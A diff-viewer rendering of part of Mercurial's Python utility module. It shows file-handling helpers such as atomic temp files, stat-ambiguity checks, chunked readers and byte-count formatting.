2083 _fspathcache[dir] = _makefspathcacheentry(dir)
2082 _fspathcache[dir] = _makefspathcacheentry(dir)
2084 contents = _fspathcache[dir]
2083 contents = _fspathcache[dir]
2085
2084
2086 found = contents.get(part)
2085 found = contents.get(part)
2087 if not found:
2086 if not found:
2088 # retry "once per directory" per "dirstate.walk" which
2087 # retry "once per directory" per "dirstate.walk" which
2089 # may take place for each patches of "hg qpush", for example
2088 # may take place for each patches of "hg qpush", for example
2090 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2089 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2091 found = contents.get(part)
2090 found = contents.get(part)
2092
2091
2093 result.append(found or part)
2092 result.append(found or part)
2094 dir = os.path.join(dir, part)
2093 dir = os.path.join(dir, part)
2095
2094
2096 return ''.join(result)
2095 return ''.join(result)
2097
2096
2098 def checknlink(testfile):
2097 def checknlink(testfile):
2099 '''check whether hardlink count reporting works properly'''
2098 '''check whether hardlink count reporting works properly'''
2100
2099
2101 # testfile may be open, so we need a separate file for checking to
2100 # testfile may be open, so we need a separate file for checking to
2102 # work around issue2543 (or testfile may get lost on Samba shares)
2101 # work around issue2543 (or testfile may get lost on Samba shares)
2103 f1, f2, fp = None, None, None
2102 f1, f2, fp = None, None, None
2104 try:
2103 try:
2105 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2104 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2106 suffix='1~', dir=os.path.dirname(testfile))
2105 suffix='1~', dir=os.path.dirname(testfile))
2107 os.close(fd)
2106 os.close(fd)
2108 f2 = '%s2~' % f1[:-2]
2107 f2 = '%s2~' % f1[:-2]
2109
2108
2110 oslink(f1, f2)
2109 oslink(f1, f2)
2111 # nlinks() may behave differently for files on Windows shares if
2110 # nlinks() may behave differently for files on Windows shares if
2112 # the file is open.
2111 # the file is open.
2113 fp = posixfile(f2)
2112 fp = posixfile(f2)
2114 return nlinks(f2) > 1
2113 return nlinks(f2) > 1
2115 except OSError:
2114 except OSError:
2116 return False
2115 return False
2117 finally:
2116 finally:
2118 if fp is not None:
2117 if fp is not None:
2119 fp.close()
2118 fp.close()
2120 for f in (f1, f2):
2119 for f in (f1, f2):
2121 try:
2120 try:
2122 if f is not None:
2121 if f is not None:
2123 os.unlink(f)
2122 os.unlink(f)
2124 except OSError:
2123 except OSError:
2125 pass
2124 pass
2126
2125
2127 def endswithsep(path):
2126 def endswithsep(path):
2128 '''Check path ends with os.sep or os.altsep.'''
2127 '''Check path ends with os.sep or os.altsep.'''
2129 return (path.endswith(pycompat.ossep)
2128 return (path.endswith(pycompat.ossep)
2130 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2129 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2131
2130
2132 def splitpath(path):
2131 def splitpath(path):
2133 '''Split path by os.sep.
2132 '''Split path by os.sep.
2134 Note that this function does not use os.altsep because this is
2133 Note that this function does not use os.altsep because this is
2135 an alternative of simple "xxx.split(os.sep)".
2134 an alternative of simple "xxx.split(os.sep)".
2136 It is recommended to use os.path.normpath() before using this
2135 It is recommended to use os.path.normpath() before using this
2137 function if need.'''
2136 function if need.'''
2138 return path.split(pycompat.ossep)
2137 return path.split(pycompat.ossep)
2139
2138
2140 def gui():
2139 def gui():
2141 '''Are we running in a GUI?'''
2140 '''Are we running in a GUI?'''
2142 if pycompat.isdarwin:
2141 if pycompat.isdarwin:
2143 if 'SSH_CONNECTION' in encoding.environ:
2142 if 'SSH_CONNECTION' in encoding.environ:
2144 # handle SSH access to a box where the user is logged in
2143 # handle SSH access to a box where the user is logged in
2145 return False
2144 return False
2146 elif getattr(osutil, 'isgui', None):
2145 elif getattr(osutil, 'isgui', None):
2147 # check if a CoreGraphics session is available
2146 # check if a CoreGraphics session is available
2148 return osutil.isgui()
2147 return osutil.isgui()
2149 else:
2148 else:
2150 # pure build; use a safe default
2149 # pure build; use a safe default
2151 return True
2150 return True
2152 else:
2151 else:
2153 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2152 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2154
2153
2155 def mktempcopy(name, emptyok=False, createmode=None):
2154 def mktempcopy(name, emptyok=False, createmode=None):
2156 """Create a temporary file with the same contents from name
2155 """Create a temporary file with the same contents from name
2157
2156
2158 The permission bits are copied from the original file.
2157 The permission bits are copied from the original file.
2159
2158
2160 If the temporary file is going to be truncated immediately, you
2159 If the temporary file is going to be truncated immediately, you
2161 can use emptyok=True as an optimization.
2160 can use emptyok=True as an optimization.
2162
2161
2163 Returns the name of the temporary file.
2162 Returns the name of the temporary file.
2164 """
2163 """
2165 d, fn = os.path.split(name)
2164 d, fn = os.path.split(name)
2166 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2165 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2167 os.close(fd)
2166 os.close(fd)
2168 # Temporary files are created with mode 0600, which is usually not
2167 # Temporary files are created with mode 0600, which is usually not
2169 # what we want. If the original file already exists, just copy
2168 # what we want. If the original file already exists, just copy
2170 # its mode. Otherwise, manually obey umask.
2169 # its mode. Otherwise, manually obey umask.
2171 copymode(name, temp, createmode)
2170 copymode(name, temp, createmode)
2172 if emptyok:
2171 if emptyok:
2173 return temp
2172 return temp
2174 try:
2173 try:
2175 try:
2174 try:
2176 ifp = posixfile(name, "rb")
2175 ifp = posixfile(name, "rb")
2177 except IOError as inst:
2176 except IOError as inst:
2178 if inst.errno == errno.ENOENT:
2177 if inst.errno == errno.ENOENT:
2179 return temp
2178 return temp
2180 if not getattr(inst, 'filename', None):
2179 if not getattr(inst, 'filename', None):
2181 inst.filename = name
2180 inst.filename = name
2182 raise
2181 raise
2183 ofp = posixfile(temp, "wb")
2182 ofp = posixfile(temp, "wb")
2184 for chunk in filechunkiter(ifp):
2183 for chunk in filechunkiter(ifp):
2185 ofp.write(chunk)
2184 ofp.write(chunk)
2186 ifp.close()
2185 ifp.close()
2187 ofp.close()
2186 ofp.close()
2188 except: # re-raises
2187 except: # re-raises
2189 try:
2188 try:
2190 os.unlink(temp)
2189 os.unlink(temp)
2191 except OSError:
2190 except OSError:
2192 pass
2191 pass
2193 raise
2192 raise
2194 return temp
2193 return temp
2195
2194
2196 class filestat(object):
2195 class filestat(object):
2197 """help to exactly detect change of a file
2196 """help to exactly detect change of a file
2198
2197
2199 'stat' attribute is result of 'os.stat()' if specified 'path'
2198 'stat' attribute is result of 'os.stat()' if specified 'path'
2200 exists. Otherwise, it is None. This can avoid preparative
2199 exists. Otherwise, it is None. This can avoid preparative
2201 'exists()' examination on client side of this class.
2200 'exists()' examination on client side of this class.
2202 """
2201 """
2203 def __init__(self, stat):
2202 def __init__(self, stat):
2204 self.stat = stat
2203 self.stat = stat
2205
2204
2206 @classmethod
2205 @classmethod
2207 def frompath(cls, path):
2206 def frompath(cls, path):
2208 try:
2207 try:
2209 stat = os.stat(path)
2208 stat = os.stat(path)
2210 except OSError as err:
2209 except OSError as err:
2211 if err.errno != errno.ENOENT:
2210 if err.errno != errno.ENOENT:
2212 raise
2211 raise
2213 stat = None
2212 stat = None
2214 return cls(stat)
2213 return cls(stat)
2215
2214
2216 @classmethod
2215 @classmethod
2217 def fromfp(cls, fp):
2216 def fromfp(cls, fp):
2218 stat = os.fstat(fp.fileno())
2217 stat = os.fstat(fp.fileno())
2219 return cls(stat)
2218 return cls(stat)
2220
2219
2221 __hash__ = object.__hash__
2220 __hash__ = object.__hash__
2222
2221
2223 def __eq__(self, old):
2222 def __eq__(self, old):
2224 try:
2223 try:
2225 # if ambiguity between stat of new and old file is
2224 # if ambiguity between stat of new and old file is
2226 # avoided, comparison of size, ctime and mtime is enough
2225 # avoided, comparison of size, ctime and mtime is enough
2227 # to exactly detect change of a file regardless of platform
2226 # to exactly detect change of a file regardless of platform
2228 return (self.stat.st_size == old.stat.st_size and
2227 return (self.stat.st_size == old.stat.st_size and
2229 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2228 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2230 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2229 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2231 except AttributeError:
2230 except AttributeError:
2232 pass
2231 pass
2233 try:
2232 try:
2234 return self.stat is None and old.stat is None
2233 return self.stat is None and old.stat is None
2235 except AttributeError:
2234 except AttributeError:
2236 return False
2235 return False
2237
2236
2238 def isambig(self, old):
2237 def isambig(self, old):
2239 """Examine whether new (= self) stat is ambiguous against old one
2238 """Examine whether new (= self) stat is ambiguous against old one
2240
2239
2241 "S[N]" below means stat of a file at N-th change:
2240 "S[N]" below means stat of a file at N-th change:
2242
2241
2243 - S[n-1].ctime < S[n].ctime: can detect change of a file
2242 - S[n-1].ctime < S[n].ctime: can detect change of a file
2244 - S[n-1].ctime == S[n].ctime
2243 - S[n-1].ctime == S[n].ctime
2245 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2244 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2246 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2245 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2247 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2246 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2248 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2247 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2249
2248
2250 Case (*2) above means that a file was changed twice or more at
2249 Case (*2) above means that a file was changed twice or more at
2251 same time in sec (= S[n-1].ctime), and comparison of timestamp
2250 same time in sec (= S[n-1].ctime), and comparison of timestamp
2252 is ambiguous.
2251 is ambiguous.
2253
2252
2254 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2253 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2255 timestamp is ambiguous".
2254 timestamp is ambiguous".
2256
2255
2257 But advancing mtime only in case (*2) doesn't work as
2256 But advancing mtime only in case (*2) doesn't work as
2258 expected, because naturally advanced S[n].mtime in case (*1)
2257 expected, because naturally advanced S[n].mtime in case (*1)
2259 might be equal to manually advanced S[n-1 or earlier].mtime.
2258 might be equal to manually advanced S[n-1 or earlier].mtime.
2260
2259
2261 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2260 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2262 treated as ambiguous regardless of mtime, to avoid overlooking
2261 treated as ambiguous regardless of mtime, to avoid overlooking
2263 by confliction between such mtime.
2262 by confliction between such mtime.
2264
2263
2265 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2264 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2266 S[n].mtime", even if size of a file isn't changed.
2265 S[n].mtime", even if size of a file isn't changed.
2267 """
2266 """
2268 try:
2267 try:
2269 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2268 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2270 except AttributeError:
2269 except AttributeError:
2271 return False
2270 return False
2272
2271
2273 def avoidambig(self, path, old):
2272 def avoidambig(self, path, old):
2274 """Change file stat of specified path to avoid ambiguity
2273 """Change file stat of specified path to avoid ambiguity
2275
2274
2276 'old' should be previous filestat of 'path'.
2275 'old' should be previous filestat of 'path'.
2277
2276
2278 This skips avoiding ambiguity, if a process doesn't have
2277 This skips avoiding ambiguity, if a process doesn't have
2279 appropriate privileges for 'path'. This returns False in this
2278 appropriate privileges for 'path'. This returns False in this
2280 case.
2279 case.
2281
2280
2282 Otherwise, this returns True, as "ambiguity is avoided".
2281 Otherwise, this returns True, as "ambiguity is avoided".
2283 """
2282 """
2284 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2283 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2285 try:
2284 try:
2286 os.utime(path, (advanced, advanced))
2285 os.utime(path, (advanced, advanced))
2287 except OSError as inst:
2286 except OSError as inst:
2288 if inst.errno == errno.EPERM:
2287 if inst.errno == errno.EPERM:
2289 # utime() on the file created by another user causes EPERM,
2288 # utime() on the file created by another user causes EPERM,
2290 # if a process doesn't have appropriate privileges
2289 # if a process doesn't have appropriate privileges
2291 return False
2290 return False
2292 raise
2291 raise
2293 return True
2292 return True
2294
2293
2295 def __ne__(self, other):
2294 def __ne__(self, other):
2296 return not self == other
2295 return not self == other
2297
2296
2298 class atomictempfile(object):
2297 class atomictempfile(object):
2299 '''writable file object that atomically updates a file
2298 '''writable file object that atomically updates a file
2300
2299
2301 All writes will go to a temporary copy of the original file. Call
2300 All writes will go to a temporary copy of the original file. Call
2302 close() when you are done writing, and atomictempfile will rename
2301 close() when you are done writing, and atomictempfile will rename
2303 the temporary copy to the original name, making the changes
2302 the temporary copy to the original name, making the changes
2304 visible. If the object is destroyed without being closed, all your
2303 visible. If the object is destroyed without being closed, all your
2305 writes are discarded.
2304 writes are discarded.
2306
2305
2307 checkambig argument of constructor is used with filestat, and is
2306 checkambig argument of constructor is used with filestat, and is
2308 useful only if target file is guarded by any lock (e.g. repo.lock
2307 useful only if target file is guarded by any lock (e.g. repo.lock
2309 or repo.wlock).
2308 or repo.wlock).
2310 '''
2309 '''
2311 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2310 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2312 self.__name = name # permanent name
2311 self.__name = name # permanent name
2313 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2312 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2314 createmode=createmode)
2313 createmode=createmode)
2315 self._fp = posixfile(self._tempname, mode)
2314 self._fp = posixfile(self._tempname, mode)
2316 self._checkambig = checkambig
2315 self._checkambig = checkambig
2317
2316
2318 # delegated methods
2317 # delegated methods
2319 self.read = self._fp.read
2318 self.read = self._fp.read
2320 self.write = self._fp.write
2319 self.write = self._fp.write
2321 self.seek = self._fp.seek
2320 self.seek = self._fp.seek
2322 self.tell = self._fp.tell
2321 self.tell = self._fp.tell
2323 self.fileno = self._fp.fileno
2322 self.fileno = self._fp.fileno
2324
2323
2325 def close(self):
2324 def close(self):
2326 if not self._fp.closed:
2325 if not self._fp.closed:
2327 self._fp.close()
2326 self._fp.close()
2328 filename = localpath(self.__name)
2327 filename = localpath(self.__name)
2329 oldstat = self._checkambig and filestat.frompath(filename)
2328 oldstat = self._checkambig and filestat.frompath(filename)
2330 if oldstat and oldstat.stat:
2329 if oldstat and oldstat.stat:
2331 rename(self._tempname, filename)
2330 rename(self._tempname, filename)
2332 newstat = filestat.frompath(filename)
2331 newstat = filestat.frompath(filename)
2333 if newstat.isambig(oldstat):
2332 if newstat.isambig(oldstat):
2334 # stat of changed file is ambiguous to original one
2333 # stat of changed file is ambiguous to original one
2335 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2334 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2336 os.utime(filename, (advanced, advanced))
2335 os.utime(filename, (advanced, advanced))
2337 else:
2336 else:
2338 rename(self._tempname, filename)
2337 rename(self._tempname, filename)
2339
2338
2340 def discard(self):
2339 def discard(self):
2341 if not self._fp.closed:
2340 if not self._fp.closed:
2342 try:
2341 try:
2343 os.unlink(self._tempname)
2342 os.unlink(self._tempname)
2344 except OSError:
2343 except OSError:
2345 pass
2344 pass
2346 self._fp.close()
2345 self._fp.close()
2347
2346
2348 def __del__(self):
2347 def __del__(self):
2349 if safehasattr(self, '_fp'): # constructor actually did something
2348 if safehasattr(self, '_fp'): # constructor actually did something
2350 self.discard()
2349 self.discard()
2351
2350
2352 def __enter__(self):
2351 def __enter__(self):
2353 return self
2352 return self
2354
2353
2355 def __exit__(self, exctype, excvalue, traceback):
2354 def __exit__(self, exctype, excvalue, traceback):
2356 if exctype is not None:
2355 if exctype is not None:
2357 self.discard()
2356 self.discard()
2358 else:
2357 else:
2359 self.close()
2358 self.close()
2360
2359
2361 def unlinkpath(f, ignoremissing=False):
2360 def unlinkpath(f, ignoremissing=False):
2362 """unlink and remove the directory if it is empty"""
2361 """unlink and remove the directory if it is empty"""
2363 if ignoremissing:
2362 if ignoremissing:
2364 tryunlink(f)
2363 tryunlink(f)
2365 else:
2364 else:
2366 unlink(f)
2365 unlink(f)
2367 # try removing directories that might now be empty
2366 # try removing directories that might now be empty
2368 try:
2367 try:
2369 removedirs(os.path.dirname(f))
2368 removedirs(os.path.dirname(f))
2370 except OSError:
2369 except OSError:
2371 pass
2370 pass
2372
2371
2373 def tryunlink(f):
2372 def tryunlink(f):
2374 """Attempt to remove a file, ignoring ENOENT errors."""
2373 """Attempt to remove a file, ignoring ENOENT errors."""
2375 try:
2374 try:
2376 unlink(f)
2375 unlink(f)
2377 except OSError as e:
2376 except OSError as e:
2378 if e.errno != errno.ENOENT:
2377 if e.errno != errno.ENOENT:
2379 raise
2378 raise
2380
2379
2381 def makedirs(name, mode=None, notindexed=False):
2380 def makedirs(name, mode=None, notindexed=False):
2382 """recursive directory creation with parent mode inheritance
2381 """recursive directory creation with parent mode inheritance
2383
2382
2384 Newly created directories are marked as "not to be indexed by
2383 Newly created directories are marked as "not to be indexed by
2385 the content indexing service", if ``notindexed`` is specified
2384 the content indexing service", if ``notindexed`` is specified
2386 for "write" mode access.
2385 for "write" mode access.
2387 """
2386 """
2388 try:
2387 try:
2389 makedir(name, notindexed)
2388 makedir(name, notindexed)
2390 except OSError as err:
2389 except OSError as err:
2391 if err.errno == errno.EEXIST:
2390 if err.errno == errno.EEXIST:
2392 return
2391 return
2393 if err.errno != errno.ENOENT or not name:
2392 if err.errno != errno.ENOENT or not name:
2394 raise
2393 raise
2395 parent = os.path.dirname(os.path.abspath(name))
2394 parent = os.path.dirname(os.path.abspath(name))
2396 if parent == name:
2395 if parent == name:
2397 raise
2396 raise
2398 makedirs(parent, mode, notindexed)
2397 makedirs(parent, mode, notindexed)
2399 try:
2398 try:
2400 makedir(name, notindexed)
2399 makedir(name, notindexed)
2401 except OSError as err:
2400 except OSError as err:
2402 # Catch EEXIST to handle races
2401 # Catch EEXIST to handle races
2403 if err.errno == errno.EEXIST:
2402 if err.errno == errno.EEXIST:
2404 return
2403 return
2405 raise
2404 raise
2406 if mode is not None:
2405 if mode is not None:
2407 os.chmod(name, mode)
2406 os.chmod(name, mode)
2408
2407
2409 def readfile(path):
2408 def readfile(path):
2410 with open(path, 'rb') as fp:
2409 with open(path, 'rb') as fp:
2411 return fp.read()
2410 return fp.read()
2412
2411
2413 def writefile(path, text):
2412 def writefile(path, text):
2414 with open(path, 'wb') as fp:
2413 with open(path, 'wb') as fp:
2415 fp.write(text)
2414 fp.write(text)
2416
2415
2417 def appendfile(path, text):
2416 def appendfile(path, text):
2418 with open(path, 'ab') as fp:
2417 with open(path, 'ab') as fp:
2419 fp.write(text)
2418 fp.write(text)
2420
2419
2421 class chunkbuffer(object):
2420 class chunkbuffer(object):
2422 """Allow arbitrary sized chunks of data to be efficiently read from an
2421 """Allow arbitrary sized chunks of data to be efficiently read from an
2423 iterator over chunks of arbitrary size."""
2422 iterator over chunks of arbitrary size."""
2424
2423
2425 def __init__(self, in_iter):
2424 def __init__(self, in_iter):
2426 """in_iter is the iterator that's iterating over the input chunks."""
2425 """in_iter is the iterator that's iterating over the input chunks."""
2427 def splitbig(chunks):
2426 def splitbig(chunks):
2428 for chunk in chunks:
2427 for chunk in chunks:
2429 if len(chunk) > 2**20:
2428 if len(chunk) > 2**20:
2430 pos = 0
2429 pos = 0
2431 while pos < len(chunk):
2430 while pos < len(chunk):
2432 end = pos + 2 ** 18
2431 end = pos + 2 ** 18
2433 yield chunk[pos:end]
2432 yield chunk[pos:end]
2434 pos = end
2433 pos = end
2435 else:
2434 else:
2436 yield chunk
2435 yield chunk
2437 self.iter = splitbig(in_iter)
2436 self.iter = splitbig(in_iter)
2438 self._queue = collections.deque()
2437 self._queue = collections.deque()
2439 self._chunkoffset = 0
2438 self._chunkoffset = 0
2440
2439
2441 def read(self, l=None):
2440 def read(self, l=None):
2442 """Read L bytes of data from the iterator of chunks of data.
2441 """Read L bytes of data from the iterator of chunks of data.
2443 Returns less than L bytes if the iterator runs dry.
2442 Returns less than L bytes if the iterator runs dry.
2444
2443
2445 If size parameter is omitted, read everything"""
2444 If size parameter is omitted, read everything"""
2446 if l is None:
2445 if l is None:
2447 return ''.join(self.iter)
2446 return ''.join(self.iter)
2448
2447
2449 left = l
2448 left = l
2450 buf = []
2449 buf = []
2451 queue = self._queue
2450 queue = self._queue
2452 while left > 0:
2451 while left > 0:
2453 # refill the queue
2452 # refill the queue
2454 if not queue:
2453 if not queue:
2455 target = 2**18
2454 target = 2**18
2456 for chunk in self.iter:
2455 for chunk in self.iter:
2457 queue.append(chunk)
2456 queue.append(chunk)
2458 target -= len(chunk)
2457 target -= len(chunk)
2459 if target <= 0:
2458 if target <= 0:
2460 break
2459 break
2461 if not queue:
2460 if not queue:
2462 break
2461 break
2463
2462
2464 # The easy way to do this would be to queue.popleft(), modify the
2463 # The easy way to do this would be to queue.popleft(), modify the
2465 # chunk (if necessary), then queue.appendleft(). However, for cases
2464 # chunk (if necessary), then queue.appendleft(). However, for cases
2466 # where we read partial chunk content, this incurs 2 dequeue
2465 # where we read partial chunk content, this incurs 2 dequeue
2467 # mutations and creates a new str for the remaining chunk in the
2466 # mutations and creates a new str for the remaining chunk in the
2468 # queue. Our code below avoids this overhead.
2467 # queue. Our code below avoids this overhead.
2469
2468
2470 chunk = queue[0]
2469 chunk = queue[0]
2471 chunkl = len(chunk)
2470 chunkl = len(chunk)
2472 offset = self._chunkoffset
2471 offset = self._chunkoffset
2473
2472
2474 # Use full chunk.
2473 # Use full chunk.
2475 if offset == 0 and left >= chunkl:
2474 if offset == 0 and left >= chunkl:
2476 left -= chunkl
2475 left -= chunkl
2477 queue.popleft()
2476 queue.popleft()
2478 buf.append(chunk)
2477 buf.append(chunk)
2479 # self._chunkoffset remains at 0.
2478 # self._chunkoffset remains at 0.
2480 continue
2479 continue
2481
2480
2482 chunkremaining = chunkl - offset
2481 chunkremaining = chunkl - offset
2483
2482
2484 # Use all of unconsumed part of chunk.
2483 # Use all of unconsumed part of chunk.
2485 if left >= chunkremaining:
2484 if left >= chunkremaining:
2486 left -= chunkremaining
2485 left -= chunkremaining
2487 queue.popleft()
2486 queue.popleft()
2488 # offset == 0 is enabled by block above, so this won't merely
2487 # offset == 0 is enabled by block above, so this won't merely
2489 # copy via ``chunk[0:]``.
2488 # copy via ``chunk[0:]``.
2490 buf.append(chunk[offset:])
2489 buf.append(chunk[offset:])
2491 self._chunkoffset = 0
2490 self._chunkoffset = 0
2492
2491
2493 # Partial chunk needed.
2492 # Partial chunk needed.
2494 else:
2493 else:
2495 buf.append(chunk[offset:offset + left])
2494 buf.append(chunk[offset:offset + left])
2496 self._chunkoffset += left
2495 self._chunkoffset += left
2497 left -= chunkremaining
2496 left -= chunkremaining
2498
2497
2499 return ''.join(buf)
2498 return ''.join(buf)
2500
2499
2501 def filechunkiter(f, size=131072, limit=None):
2500 def filechunkiter(f, size=131072, limit=None):
2502 """Create a generator that produces the data in the file size
2501 """Create a generator that produces the data in the file size
2503 (default 131072) bytes at a time, up to optional limit (default is
2502 (default 131072) bytes at a time, up to optional limit (default is
2504 to read all data). Chunks may be less than size bytes if the
2503 to read all data). Chunks may be less than size bytes if the
2505 chunk is the last chunk in the file, or the file is a socket or
2504 chunk is the last chunk in the file, or the file is a socket or
2506 some other type of file that sometimes reads less data than is
2505 some other type of file that sometimes reads less data than is
2507 requested."""
2506 requested."""
2508 assert size >= 0
2507 assert size >= 0
2509 assert limit is None or limit >= 0
2508 assert limit is None or limit >= 0
2510 while True:
2509 while True:
2511 if limit is None:
2510 if limit is None:
2512 nbytes = size
2511 nbytes = size
2513 else:
2512 else:
2514 nbytes = min(limit, size)
2513 nbytes = min(limit, size)
2515 s = nbytes and f.read(nbytes)
2514 s = nbytes and f.read(nbytes)
2516 if not s:
2515 if not s:
2517 break
2516 break
2518 if limit:
2517 if limit:
2519 limit -= len(s)
2518 limit -= len(s)
2520 yield s
2519 yield s
2521
2520
2522 class cappedreader(object):
2521 class cappedreader(object):
2523 """A file object proxy that allows reading up to N bytes.
2522 """A file object proxy that allows reading up to N bytes.
2524
2523
2525 Given a source file object, instances of this type allow reading up to
2524 Given a source file object, instances of this type allow reading up to
2526 N bytes from that source file object. Attempts to read past the allowed
2525 N bytes from that source file object. Attempts to read past the allowed
2527 limit are treated as EOF.
2526 limit are treated as EOF.
2528
2527
2529 It is assumed that I/O is not performed on the original file object
2528 It is assumed that I/O is not performed on the original file object
2530 in addition to I/O that is performed by this instance. If there is,
2529 in addition to I/O that is performed by this instance. If there is,
2531 state tracking will get out of sync and unexpected results will ensue.
2530 state tracking will get out of sync and unexpected results will ensue.
2532 """
2531 """
2533 def __init__(self, fh, limit):
2532 def __init__(self, fh, limit):
2534 """Allow reading up to <limit> bytes from <fh>."""
2533 """Allow reading up to <limit> bytes from <fh>."""
2535 self._fh = fh
2534 self._fh = fh
2536 self._left = limit
2535 self._left = limit
2537
2536
2538 def read(self, n=-1):
2537 def read(self, n=-1):
2539 if not self._left:
2538 if not self._left:
2540 return b''
2539 return b''
2541
2540
2542 if n < 0:
2541 if n < 0:
2543 n = self._left
2542 n = self._left
2544
2543
2545 data = self._fh.read(min(n, self._left))
2544 data = self._fh.read(min(n, self._left))
2546 self._left -= len(data)
2545 self._left -= len(data)
2547 assert self._left >= 0
2546 assert self._left >= 0
2548
2547
2549 return data
2548 return data
2550
2549
2551 def readinto(self, b):
2550 def readinto(self, b):
2552 res = self.read(len(b))
2551 res = self.read(len(b))
2553 if res is None:
2552 if res is None:
2554 return None
2553 return None
2555
2554
2556 b[0:len(res)] = res
2555 b[0:len(res)] = res
2557 return len(res)
2556 return len(res)
2558
2557
2559 def unitcountfn(*unittable):
2558 def unitcountfn(*unittable):
2560 '''return a function that renders a readable count of some quantity'''
2559 '''return a function that renders a readable count of some quantity'''
2561
2560
2562 def go(count):
2561 def go(count):
2563 for multiplier, divisor, format in unittable:
2562 for multiplier, divisor, format in unittable:
2564 if abs(count) >= divisor * multiplier:
2563 if abs(count) >= divisor * multiplier:
2565 return format % (count / float(divisor))
2564 return format % (count / float(divisor))
2566 return unittable[-1][2] % count
2565 return unittable[-1][2] % count
2567
2566
2568 return go
2567 return go
2569
2568
2570 def processlinerange(fromline, toline):
2569 def processlinerange(fromline, toline):
2571 """Check that linerange <fromline>:<toline> makes sense and return a
2570 """Check that linerange <fromline>:<toline> makes sense and return a
2572 0-based range.
2571 0-based range.
2573
2572
2574 >>> processlinerange(10, 20)
2573 >>> processlinerange(10, 20)
2575 (9, 20)
2574 (9, 20)
2576 >>> processlinerange(2, 1)
2575 >>> processlinerange(2, 1)
2577 Traceback (most recent call last):
2576 Traceback (most recent call last):
2578 ...
2577 ...
2579 ParseError: line range must be positive
2578 ParseError: line range must be positive
2580 >>> processlinerange(0, 5)
2579 >>> processlinerange(0, 5)
2581 Traceback (most recent call last):
2580 Traceback (most recent call last):
2582 ...
2581 ...
2583 ParseError: fromline must be strictly positive
2582 ParseError: fromline must be strictly positive
2584 """
2583 """
2585 if toline - fromline < 0:
2584 if toline - fromline < 0:
2586 raise error.ParseError(_("line range must be positive"))
2585 raise error.ParseError(_("line range must be positive"))
2587 if fromline < 1:
2586 if fromline < 1:
2588 raise error.ParseError(_("fromline must be strictly positive"))
2587 raise error.ParseError(_("fromline must be strictly positive"))
2589 return fromline - 1, toline
2588 return fromline - 1, toline
2590
2589
2591 bytecount = unitcountfn(
2590 bytecount = unitcountfn(
2592 (100, 1 << 30, _('%.0f GB')),
2591 (100, 1 << 30, _('%.0f GB')),
2593 (10, 1 << 30, _('%.1f GB')),
2592 (10, 1 << 30, _('%.1f GB')),
2594 (1, 1 << 30, _('%.2f GB')),
2593 (1, 1 << 30, _('%.2f GB')),
2595 (100, 1 << 20, _('%.0f MB')),
2594 (100, 1 << 20, _('%.0f MB')),
2596 (10, 1 << 20, _('%.1f MB')),
2595 (10, 1 << 20, _('%.1f MB')),
2597 (1, 1 << 20, _('%.2f MB')),
2596 (1, 1 << 20, _('%.2f MB')),
2598 (100, 1 << 10, _('%.0f KB')),
2597 (100, 1 << 10, _('%.0f KB')),
2599 (10, 1 << 10, _('%.1f KB')),
2598 (10, 1 << 10, _('%.1f KB')),
2600 (1, 1 << 10, _('%.2f KB')),
2599 (1, 1 << 10, _('%.2f KB')),
2601 (1, 1, _('%.0f bytes')),
2600 (1, 1, _('%.0f bytes')),
2602 )
2601 )
2603
2602
2604 class transformingwriter(object):
2603 class transformingwriter(object):
2605 """Writable file wrapper to transform data by function"""
2604 """Writable file wrapper to transform data by function"""
2606
2605
2607 def __init__(self, fp, encode):
2606 def __init__(self, fp, encode):
2608 self._fp = fp
2607 self._fp = fp
2609 self._encode = encode
2608 self._encode = encode
2610
2609
2611 def close(self):
2610 def close(self):
2612 self._fp.close()
2611 self._fp.close()
2613
2612
2614 def flush(self):
2613 def flush(self):
2615 self._fp.flush()
2614 self._fp.flush()
2616
2615
2617 def write(self, data):
2616 def write(self, data):
2618 return self._fp.write(self._encode(data))
2617 return self._fp.write(self._encode(data))
2619
2618
2620 # Matches a single EOL which can either be a CRLF where repeated CR
2619 # Matches a single EOL which can either be a CRLF where repeated CR
2621 # are removed or a LF. We do not care about old Macintosh files, so a
2620 # are removed or a LF. We do not care about old Macintosh files, so a
2622 # stray CR is an error.
2621 # stray CR is an error.
2623 _eolre = remod.compile(br'\r*\n')
2622 _eolre = remod.compile(br'\r*\n')
